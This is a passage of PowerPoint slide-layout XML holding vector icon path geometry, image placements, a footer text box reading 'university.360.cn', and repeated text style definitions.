                <a:gd name="T8" fmla="*/ 9 w 35"/>
                <a:gd name="T9" fmla="*/ 3 h 34"/>
                <a:gd name="T10" fmla="*/ 2 w 35"/>
                <a:gd name="T11" fmla="*/ 15 h 34"/>
                <a:gd name="T12" fmla="*/ 0 w 35"/>
                <a:gd name="T13" fmla="*/ 12 h 34"/>
                <a:gd name="T14" fmla="*/ 8 w 35"/>
                <a:gd name="T15" fmla="*/ 0 h 34"/>
                <a:gd name="T16" fmla="*/ 10 w 35"/>
                <a:gd name="T17" fmla="*/ 0 h 34"/>
                <a:gd name="T18" fmla="*/ 3 w 35"/>
                <a:gd name="T19" fmla="*/ 24 h 34"/>
                <a:gd name="T20" fmla="*/ 5 w 35"/>
                <a:gd name="T21" fmla="*/ 22 h 34"/>
                <a:gd name="T22" fmla="*/ 8 w 35"/>
                <a:gd name="T23" fmla="*/ 26 h 34"/>
                <a:gd name="T24" fmla="*/ 12 w 35"/>
                <a:gd name="T25" fmla="*/ 18 h 34"/>
                <a:gd name="T26" fmla="*/ 2 w 35"/>
                <a:gd name="T27" fmla="*/ 18 h 34"/>
                <a:gd name="T28" fmla="*/ 2 w 35"/>
                <a:gd name="T29" fmla="*/ 16 h 34"/>
                <a:gd name="T30" fmla="*/ 15 w 35"/>
                <a:gd name="T31" fmla="*/ 16 h 34"/>
                <a:gd name="T32" fmla="*/ 15 w 35"/>
                <a:gd name="T33" fmla="*/ 18 h 34"/>
                <a:gd name="T34" fmla="*/ 10 w 35"/>
                <a:gd name="T35" fmla="*/ 28 h 34"/>
                <a:gd name="T36" fmla="*/ 13 w 35"/>
                <a:gd name="T37" fmla="*/ 32 h 34"/>
                <a:gd name="T38" fmla="*/ 10 w 35"/>
                <a:gd name="T39" fmla="*/ 33 h 34"/>
                <a:gd name="T40" fmla="*/ 3 w 35"/>
                <a:gd name="T41" fmla="*/ 24 h 34"/>
                <a:gd name="T42" fmla="*/ 7 w 35"/>
                <a:gd name="T43" fmla="*/ 9 h 34"/>
                <a:gd name="T44" fmla="*/ 9 w 35"/>
                <a:gd name="T45" fmla="*/ 8 h 34"/>
                <a:gd name="T46" fmla="*/ 12 w 35"/>
                <a:gd name="T47" fmla="*/ 13 h 34"/>
                <a:gd name="T48" fmla="*/ 9 w 35"/>
                <a:gd name="T49" fmla="*/ 15 h 34"/>
                <a:gd name="T50" fmla="*/ 7 w 35"/>
                <a:gd name="T51" fmla="*/ 9 h 34"/>
                <a:gd name="T52" fmla="*/ 24 w 35"/>
                <a:gd name="T53" fmla="*/ 12 h 34"/>
                <a:gd name="T54" fmla="*/ 27 w 35"/>
                <a:gd name="T55" fmla="*/ 12 h 34"/>
                <a:gd name="T56" fmla="*/ 27 w 35"/>
                <a:gd name="T57" fmla="*/ 17 h 34"/>
                <a:gd name="T58" fmla="*/ 26 w 35"/>
                <a:gd name="T59" fmla="*/ 24 h 34"/>
                <a:gd name="T60" fmla="*/ 35 w 35"/>
                <a:gd name="T61" fmla="*/ 32 h 34"/>
                <a:gd name="T62" fmla="*/ 33 w 35"/>
                <a:gd name="T63" fmla="*/ 34 h 34"/>
                <a:gd name="T64" fmla="*/ 25 w 35"/>
                <a:gd name="T65" fmla="*/ 26 h 34"/>
                <a:gd name="T66" fmla="*/ 24 w 35"/>
                <a:gd name="T67" fmla="*/ 27 h 34"/>
                <a:gd name="T68" fmla="*/ 16 w 35"/>
                <a:gd name="T69" fmla="*/ 34 h 34"/>
                <a:gd name="T70" fmla="*/ 14 w 35"/>
                <a:gd name="T71" fmla="*/ 32 h 34"/>
                <a:gd name="T72" fmla="*/ 22 w 35"/>
                <a:gd name="T73" fmla="*/ 26 h 34"/>
                <a:gd name="T74" fmla="*/ 24 w 35"/>
                <a:gd name="T75" fmla="*/ 17 h 34"/>
                <a:gd name="T76" fmla="*/ 24 w 35"/>
                <a:gd name="T77" fmla="*/ 12 h 34"/>
                <a:gd name="T78" fmla="*/ 17 w 35"/>
                <a:gd name="T79" fmla="*/ 8 h 34"/>
                <a:gd name="T80" fmla="*/ 23 w 35"/>
                <a:gd name="T81" fmla="*/ 8 h 34"/>
                <a:gd name="T82" fmla="*/ 24 w 35"/>
                <a:gd name="T83" fmla="*/ 3 h 34"/>
                <a:gd name="T84" fmla="*/ 15 w 35"/>
                <a:gd name="T85" fmla="*/ 3 h 34"/>
                <a:gd name="T86" fmla="*/ 15 w 35"/>
                <a:gd name="T87" fmla="*/ 1 h 34"/>
                <a:gd name="T88" fmla="*/ 35 w 35"/>
                <a:gd name="T89" fmla="*/ 1 h 34"/>
                <a:gd name="T90" fmla="*/ 35 w 35"/>
                <a:gd name="T91" fmla="*/ 3 h 34"/>
                <a:gd name="T92" fmla="*/ 27 w 35"/>
                <a:gd name="T93" fmla="*/ 3 h 34"/>
                <a:gd name="T94" fmla="*/ 26 w 35"/>
                <a:gd name="T95" fmla="*/ 8 h 34"/>
                <a:gd name="T96" fmla="*/ 34 w 35"/>
                <a:gd name="T97" fmla="*/ 8 h 34"/>
                <a:gd name="T98" fmla="*/ 34 w 35"/>
                <a:gd name="T99" fmla="*/ 25 h 34"/>
                <a:gd name="T100" fmla="*/ 31 w 35"/>
                <a:gd name="T101" fmla="*/ 25 h 34"/>
                <a:gd name="T102" fmla="*/ 31 w 35"/>
                <a:gd name="T103" fmla="*/ 11 h 34"/>
                <a:gd name="T104" fmla="*/ 19 w 35"/>
                <a:gd name="T105" fmla="*/ 11 h 34"/>
                <a:gd name="T106" fmla="*/ 19 w 35"/>
                <a:gd name="T107" fmla="*/ 25 h 34"/>
                <a:gd name="T108" fmla="*/ 17 w 35"/>
                <a:gd name="T109" fmla="*/ 25 h 34"/>
                <a:gd name="T110" fmla="*/ 17 w 35"/>
                <a:gd name="T111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" h="34">
                  <a:moveTo>
                    <a:pt x="10" y="0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2" y="3"/>
                    <a:pt x="14" y="6"/>
                    <a:pt x="16" y="9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8"/>
                    <a:pt x="11" y="5"/>
                    <a:pt x="9" y="3"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="7" y="7"/>
                    <a:pt x="5" y="11"/>
                    <a:pt x="2" y="15"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="2" y="14"/>
                    <a:pt x="1" y="13"/>
                    <a:pt x="0" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="3" y="9"/>
                    <a:pt x="6" y="5"/>
                    <a:pt x="8" y="0"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="10" y="0"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="3" y="24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6" y="24"/>
                    <a:pt x="7" y="25"/>
                    <a:pt x="8" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="10" y="24"/>
                    <a:pt x="11" y="21"/>
                    <a:pt x="1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22"/>
                    <a:pt x="11" y="26"/>
                    <a:pt x="10" y="28"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="11" y="29"/>
                    <a:pt x="12" y="31"/>
                    <a:pt x="13" y="32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8" y="30"/>
                    <a:pt x="5" y="27"/>
                    <a:pt x="3" y="24"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="7" y="9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0" y="10"/>
                    <a:pt x="11" y="12"/>
                    <a:pt x="12" y="13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3"/>
                    <a:pt x="8" y="11"/>
                    <a:pt x="7" y="9"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="24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20"/>
                    <a:pt x="26" y="22"/>
                    <a:pt x="26" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="29" y="26"/>
                    <a:pt x="32" y="29"/>
                    <a:pt x="35" y="32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1" y="31"/>
                    <a:pt x="28" y="29"/>
                    <a:pt x="25" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="25" y="27"/>
                    <a:pt x="24" y="27"/>
                    <a:pt x="24" y="27"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="30"/>
                    <a:pt x="20" y="32"/>
                    <a:pt x="16" y="34"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="15" y="33"/>
                    <a:pt x="14" y="32"/>
                    <a:pt x="14" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="18" y="30"/>
                    <a:pt x="20" y="28"/>
                    <a:pt x="22" y="26"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="24"/>
                    <a:pt x="24" y="21"/>
                    <a:pt x="24" y="17"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="24" y="12"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="17" y="8"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="23" y="8"/>
                    <a:pt x="23" y="8"/>
                    <a:pt x="23" y="8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7" y="25"/>
                    <a:pt x="17" y="25"/>
                    <a:pt x="17" y="25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39" name="Freeform 25"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8409473" y="-264103"/>
              <a:ext cx="58415" cy="54520"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 35"/>
                <a:gd name="T1" fmla="*/ 20 h 32"/>
                <a:gd name="T2" fmla="*/ 24 w 35"/>
                <a:gd name="T3" fmla="*/ 20 h 32"/>
                <a:gd name="T4" fmla="*/ 24 w 35"/>
                <a:gd name="T5" fmla="*/ 17 h 32"/>
                <a:gd name="T6" fmla="*/ 27 w 35"/>
                <a:gd name="T7" fmla="*/ 17 h 32"/>
                <a:gd name="T8" fmla="*/ 27 w 35"/>
                <a:gd name="T9" fmla="*/ 20 h 32"/>
                <a:gd name="T10" fmla="*/ 35 w 35"/>
                <a:gd name="T11" fmla="*/ 20 h 32"/>
                <a:gd name="T12" fmla="*/ 35 w 35"/>
                <a:gd name="T13" fmla="*/ 22 h 32"/>
                <a:gd name="T14" fmla="*/ 27 w 35"/>
                <a:gd name="T15" fmla="*/ 22 h 32"/>
                <a:gd name="T16" fmla="*/ 27 w 35"/>
                <a:gd name="T17" fmla="*/ 28 h 32"/>
                <a:gd name="T18" fmla="*/ 23 w 35"/>
                <a:gd name="T19" fmla="*/ 32 h 32"/>
                <a:gd name="T20" fmla="*/ 17 w 35"/>
                <a:gd name="T21" fmla="*/ 32 h 32"/>
                <a:gd name="T22" fmla="*/ 17 w 35"/>
                <a:gd name="T23" fmla="*/ 29 h 32"/>
                <a:gd name="T24" fmla="*/ 22 w 35"/>
                <a:gd name="T25" fmla="*/ 29 h 32"/>
                <a:gd name="T26" fmla="*/ 24 w 35"/>
                <a:gd name="T27" fmla="*/ 27 h 32"/>
                <a:gd name="T28" fmla="*/ 24 w 35"/>
                <a:gd name="T29" fmla="*/ 22 h 32"/>
                <a:gd name="T30" fmla="*/ 0 w 35"/>
                <a:gd name="T31" fmla="*/ 22 h 32"/>
                <a:gd name="T32" fmla="*/ 0 w 35"/>
                <a:gd name="T33" fmla="*/ 20 h 32"/>
                <a:gd name="T34" fmla="*/ 9 w 35"/>
                <a:gd name="T35" fmla="*/ 14 h 32"/>
                <a:gd name="T36" fmla="*/ 28 w 35"/>
                <a:gd name="T37" fmla="*/ 14 h 32"/>
                <a:gd name="T38" fmla="*/ 31 w 35"/>
                <a:gd name="T39" fmla="*/ 12 h 32"/>
                <a:gd name="T40" fmla="*/ 32 w 35"/>
                <a:gd name="T41" fmla="*/ 8 h 32"/>
                <a:gd name="T42" fmla="*/ 34 w 35"/>
                <a:gd name="T43" fmla="*/ 9 h 32"/>
                <a:gd name="T44" fmla="*/ 33 w 35"/>
                <a:gd name="T45" fmla="*/ 13 h 32"/>
                <a:gd name="T46" fmla="*/ 28 w 35"/>
                <a:gd name="T47" fmla="*/ 16 h 32"/>
                <a:gd name="T48" fmla="*/ 9 w 35"/>
                <a:gd name="T49" fmla="*/ 16 h 32"/>
                <a:gd name="T50" fmla="*/ 4 w 35"/>
                <a:gd name="T51" fmla="*/ 12 h 32"/>
                <a:gd name="T52" fmla="*/ 4 w 35"/>
                <a:gd name="T53" fmla="*/ 0 h 32"/>
                <a:gd name="T54" fmla="*/ 29 w 35"/>
                <a:gd name="T55" fmla="*/ 0 h 32"/>
                <a:gd name="T56" fmla="*/ 29 w 35"/>
                <a:gd name="T57" fmla="*/ 10 h 32"/>
                <a:gd name="T58" fmla="*/ 26 w 35"/>
                <a:gd name="T59" fmla="*/ 10 h 32"/>
                <a:gd name="T60" fmla="*/ 26 w 35"/>
                <a:gd name="T61" fmla="*/ 9 h 32"/>
                <a:gd name="T62" fmla="*/ 7 w 35"/>
                <a:gd name="T63" fmla="*/ 9 h 32"/>
                <a:gd name="T64" fmla="*/ 7 w 35"/>
                <a:gd name="T65" fmla="*/ 11 h 32"/>
                <a:gd name="T66" fmla="*/ 9 w 35"/>
                <a:gd name="T67" fmla="*/ 14 h 32"/>
                <a:gd name="T68" fmla="*/ 6 w 35"/>
                <a:gd name="T69" fmla="*/ 24 h 32"/>
                <a:gd name="T70" fmla="*/ 8 w 35"/>
                <a:gd name="T71" fmla="*/ 22 h 32"/>
                <a:gd name="T72" fmla="*/ 14 w 35"/>
                <a:gd name="T73" fmla="*/ 27 h 32"/>
                <a:gd name="T74" fmla="*/ 12 w 35"/>
                <a:gd name="T75" fmla="*/ 29 h 32"/>
                <a:gd name="T76" fmla="*/ 6 w 35"/>
                <a:gd name="T77" fmla="*/ 24 h 32"/>
                <a:gd name="T78" fmla="*/ 7 w 35"/>
                <a:gd name="T79" fmla="*/ 2 h 32"/>
                <a:gd name="T80" fmla="*/ 7 w 35"/>
                <a:gd name="T81" fmla="*/ 7 h 32"/>
                <a:gd name="T82" fmla="*/ 26 w 35"/>
                <a:gd name="T83" fmla="*/ 7 h 32"/>
                <a:gd name="T84" fmla="*/ 26 w 35"/>
                <a:gd name="T85" fmla="*/ 2 h 32"/>
                <a:gd name="T86" fmla="*/ 7 w 35"/>
                <a:gd name="T8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" h="32">
                  <a:moveTo>
                    <a:pt x="0" y="20"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="20"/>
                    <a:pt x="24" y="20"/>
                    <a:pt x="24" y="20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31"/>
                    <a:pt x="26" y="32"/>
                    <a:pt x="23" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="22" y="32"/>
                    <a:pt x="20" y="32"/>
                    <a:pt x="17" y="32"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="17" y="31"/>
                    <a:pt x="17" y="30"/>
                    <a:pt x="17" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="19" y="29"/>
                    <a:pt x="20" y="29"/>
                    <a:pt x="22" y="29"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="24" y="29"/>
                    <a:pt x="24" y="29"/>
                    <a:pt x="24" y="27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0" y="22"/>
                    <a:pt x="0" y="22"/>
                    <a:pt x="0" y="22"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="0" y="20"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="9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9" y="14"/>
                    <a:pt x="31" y="13"/>
                    <a:pt x="31" y="12"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="31" y="11"/>
                    <a:pt x="31" y="10"/>
                    <a:pt x="32" y="8"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="32" y="8"/>
                    <a:pt x="33" y="9"/>
                    <a:pt x="34" y="9"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="34" y="11"/>
                    <a:pt x="34" y="12"/>
                    <a:pt x="33" y="13"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="33" y="15"/>
                    <a:pt x="31" y="16"/>
                    <a:pt x="28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5" y="16"/>
                    <a:pt x="4" y="15"/>
                    <a:pt x="4" y="1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3"/>
                    <a:pt x="7" y="14"/>
                    <a:pt x="9" y="14"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="6" y="24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11" y="24"/>
                    <a:pt x="13" y="26"/>
                    <a:pt x="14" y="27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0" y="27"/>
                    <a:pt x="8" y="25"/>
                    <a:pt x="6" y="24"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="7" y="2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2"/>
                    <a:pt x="26" y="2"/>
                    <a:pt x="26" y="2"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="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40" name="Freeform 26"/>
            <p:cNvSpPr>
              <a:spLocks noEditPoints="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="8523964" y="-267218"/>
              <a:ext cx="58415" cy="59193"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 35"/>
                <a:gd name="T1" fmla="*/ 11 h 35"/>
                <a:gd name="T2" fmla="*/ 14 w 35"/>
                <a:gd name="T3" fmla="*/ 11 h 35"/>
                <a:gd name="T4" fmla="*/ 14 w 35"/>
                <a:gd name="T5" fmla="*/ 7 h 35"/>
                <a:gd name="T6" fmla="*/ 4 w 35"/>
                <a:gd name="T7" fmla="*/ 7 h 35"/>
                <a:gd name="T8" fmla="*/ 4 w 35"/>
                <a:gd name="T9" fmla="*/ 5 h 35"/>
                <a:gd name="T10" fmla="*/ 14 w 35"/>
                <a:gd name="T11" fmla="*/ 5 h 35"/>
                <a:gd name="T12" fmla="*/ 14 w 35"/>
                <a:gd name="T13" fmla="*/ 0 h 35"/>
                <a:gd name="T14" fmla="*/ 17 w 35"/>
                <a:gd name="T15" fmla="*/ 0 h 35"/>
                <a:gd name="T16" fmla="*/ 17 w 35"/>
                <a:gd name="T17" fmla="*/ 5 h 35"/>
                <a:gd name="T18" fmla="*/ 26 w 35"/>
                <a:gd name="T19" fmla="*/ 5 h 35"/>
                <a:gd name="T20" fmla="*/ 26 w 35"/>
                <a:gd name="T21" fmla="*/ 7 h 35"/>
                <a:gd name="T22" fmla="*/ 17 w 35"/>
                <a:gd name="T23" fmla="*/ 7 h 35"/>
                <a:gd name="T24" fmla="*/ 17 w 35"/>
                <a:gd name="T25" fmla="*/ 11 h 35"/>
                <a:gd name="T26" fmla="*/ 20 w 35"/>
                <a:gd name="T27" fmla="*/ 11 h 35"/>
                <a:gd name="T28" fmla="*/ 30 w 35"/>
                <a:gd name="T29" fmla="*/ 2 h 35"/>
                <a:gd name="T30" fmla="*/ 32 w 35"/>
                <a:gd name="T31" fmla="*/ 4 h 35"/>
                <a:gd name="T32" fmla="*/ 25 w 35"/>
                <a:gd name="T33" fmla="*/ 11 h 35"/>
                <a:gd name="T34" fmla="*/ 35 w 35"/>
                <a:gd name="T35" fmla="*/ 11 h 35"/>
                <a:gd name="T36" fmla="*/ 35 w 35"/>
                <a:gd name="T37" fmla="*/ 14 h 35"/>
                <a:gd name="T38" fmla="*/ 22 w 35"/>
                <a:gd name="T39" fmla="*/ 14 h 35"/>
                <a:gd name="T40" fmla="*/ 15 w 35"/>
                <a:gd name="T41" fmla="*/ 18 h 35"/>
                <a:gd name="T42" fmla="*/ 29 w 35"/>
                <a:gd name="T43" fmla="*/ 18 h 35"/>
                <a:gd name="T44" fmla="*/ 29 w 35"/>
                <a:gd name="T45" fmla="*/ 35 h 35"/>
                <a:gd name="T46" fmla="*/ 26 w 35"/>
                <a:gd name="T47" fmla="*/ 35 h 35"/>
                <a:gd name="T48" fmla="*/ 26 w 35"/>
                <a:gd name="T49" fmla="*/ 33 h 35"/>
                <a:gd name="T50" fmla="*/ 10 w 35"/>
                <a:gd name="T51" fmla="*/ 33 h 35"/>
                <a:gd name="T52" fmla="*/ 10 w 35"/>
                <a:gd name="T53" fmla="*/ 35 h 35"/>
                <a:gd name="T54" fmla="*/ 7 w 35"/>
                <a:gd name="T55" fmla="*/ 35 h 35"/>
                <a:gd name="T56" fmla="*/ 7 w 35"/>
                <a:gd name="T57" fmla="*/ 22 h 35"/>
                <a:gd name="T58" fmla="*/ 1 w 35"/>
                <a:gd name="T59" fmla="*/ 24 h 35"/>
                <a:gd name="T60" fmla="*/ 0 w 35"/>
                <a:gd name="T61" fmla="*/ 21 h 35"/>
                <a:gd name="T62" fmla="*/ 17 w 35"/>
                <a:gd name="T63" fmla="*/ 14 h 35"/>
                <a:gd name="T64" fmla="*/ 1 w 35"/>
                <a:gd name="T65" fmla="*/ 14 h 35"/>
                <a:gd name="T66" fmla="*/ 1 w 35"/>
                <a:gd name="T67" fmla="*/ 11 h 35"/>
                <a:gd name="T68" fmla="*/ 10 w 35"/>
                <a:gd name="T69" fmla="*/ 20 h 35"/>
                <a:gd name="T70" fmla="*/ 10 w 35"/>
                <a:gd name="T71" fmla="*/ 24 h 35"/>
                <a:gd name="T72" fmla="*/ 26 w 35"/>
                <a:gd name="T73" fmla="*/ 24 h 35"/>
                <a:gd name="T74" fmla="*/ 26 w 35"/>
                <a:gd name="T75" fmla="*/ 20 h 35"/>
                <a:gd name="T76" fmla="*/ 11 w 35"/>
                <a:gd name="T77" fmla="*/ 20 h 35"/>
                <a:gd name="T78" fmla="*/ 10 w 35"/>
                <a:gd name="T79" fmla="*/ 20 h 35"/>
                <a:gd name="T80" fmla="*/ 10 w 35"/>
                <a:gd name="T81" fmla="*/ 30 h 35"/>
                <a:gd name="T82" fmla="*/ 26 w 35"/>
                <a:gd name="T83" fmla="*/ 30 h 35"/>
                <a:gd name="T84" fmla="*/ 26 w 35"/>
                <a:gd name="T85" fmla="*/ 26 h 35"/>
                <a:gd name="T86" fmla="*/ 10 w 35"/>
                <a:gd name="T87" fmla="*/ 26 h 35"/>
                <a:gd name="T88" fmla="*/ 10 w 35"/>
                <a:gd name="T89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5" h="35">
                  <a:moveTo>
                    <a:pt x="1" y="11"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="14" y="11"/>
                    <a:pt x="14" y="11"/>
                    <a:pt x="14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4" y="9"/>
                    <a:pt x="27" y="6"/>
                    <a:pt x="30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0" y="7"/>
                    <a:pt x="28" y="9"/>
                    <a:pt x="2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0" y="15"/>
                    <a:pt x="18" y="16"/>
                    <a:pt x="15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2"/>
                    <a:pt x="4" y="23"/>
                    <a:pt x="1" y="24"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="23"/>
                    <a:pt x="1" y="22"/>
                    <a:pt x="0" y="21"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="6" y="19"/>
                    <a:pt x="12" y="17"/>
                    <a:pt x="17" y="14"/>
                  </a:cubicBezTo>
                  <a:cubicBezTo>
                    <a:pt x="1" y="14"/>
                    <a:pt x="1" y="14"/>
                    <a:pt x="1" y="14"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1" y="11"/>
                  </a:lnTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10" y="20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0" y="20"/>
                    <a:pt x="10" y="20"/>
                  </a:cubicBezTo>
                  <a:close/>
                  <a:moveTo>
                    <a:pt x="10" y="30"/>
                  </a:moveTo>
                  <a:cubicBezTo>
                    <a:pt x="26" y="30"/>
                    <a:pt x="26" y="30"/>
                    <a:pt x="26" y="30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10" y="26"/>
                    <a:pt x="10" y="26"/>
                    <a:pt x="10" y="26"/>
                  </a:cubicBezTo>
                  <a:lnTo>
                    <a:pt x="1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35706017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 descr="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="25965" t="26296"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11124826" y="0"/>
            <a:ext cx="1067174" cy="10647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" name="图片 10" descr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842" y="364340"/>
            <a:ext cx="548055" cy="5760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片 8" descr="图片 8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43969" y="6369050"/>
            <a:ext cx="11304001" cy="770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标题 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196340" y="6463579"/>
            <a:ext cx="9799320" cy="359411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 anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr spc="200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sz="1600" dirty="0"/>
              <a:t>university.360.cn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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838"/>
          </a:solidFill>
          <a:uFillTx/>
          <a:latin typeface="+mj-lt"/>
          <a:ea typeface="+mj-ea"/>
          <a:cs typeface="+mj-cs"/>
          <a:sym typeface="Calibri" panose="020F0502020204030204"/>
        </a:defRPr>
      </a:lvl9pPr>
    </p:titleStyle>
    <p:bodyStyle>
      <a:lvl1pPr marL="0" marR="0" indent="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723900" marR="0" indent="-2667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1234440" marR="0" indent="-32004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1727200" marR="0" indent="-3556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2184400" marR="0" indent="-3556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2641600" marR="0" indent="-3556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3098800" marR="0" indent="-3556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3556000" marR="0" indent="-3556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4013200" marR="0" indent="-3556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Calibri" panose="020F050202020403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 descr="图片 7"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6"/>
          <a:srcRect l="25965" t="26296"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="11124826" y="0"/>
            <a:ext cx="1067174" cy="10647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6" name="图片 10" descr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842" y="364340"/>
            <a:ext cx="548055" cy="5760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片 8" descr="图片 8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43969" y="6369050"/>
            <a:ext cx="11304001" cy="7707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标题 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1196340" y="6463579"/>
            <a:ext cx="9799320" cy="359411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 anchor="b">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="ctr">
              <a:lnSpc>
                <a:spcPct val="90000"/>
              </a:lnSpc>
              <a:defRPr spc="200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sz="1600" dirty="0"/>
              <a:t>university.360.cn</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1581952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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
          <a:solidFill>
            <a:srgbClr val="3B3838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1" i="0" u="none" strike="noStrike" cap="none" spc="0" baseline="0">
          <a:ln>
            <a:noFill/>
          </a:ln>
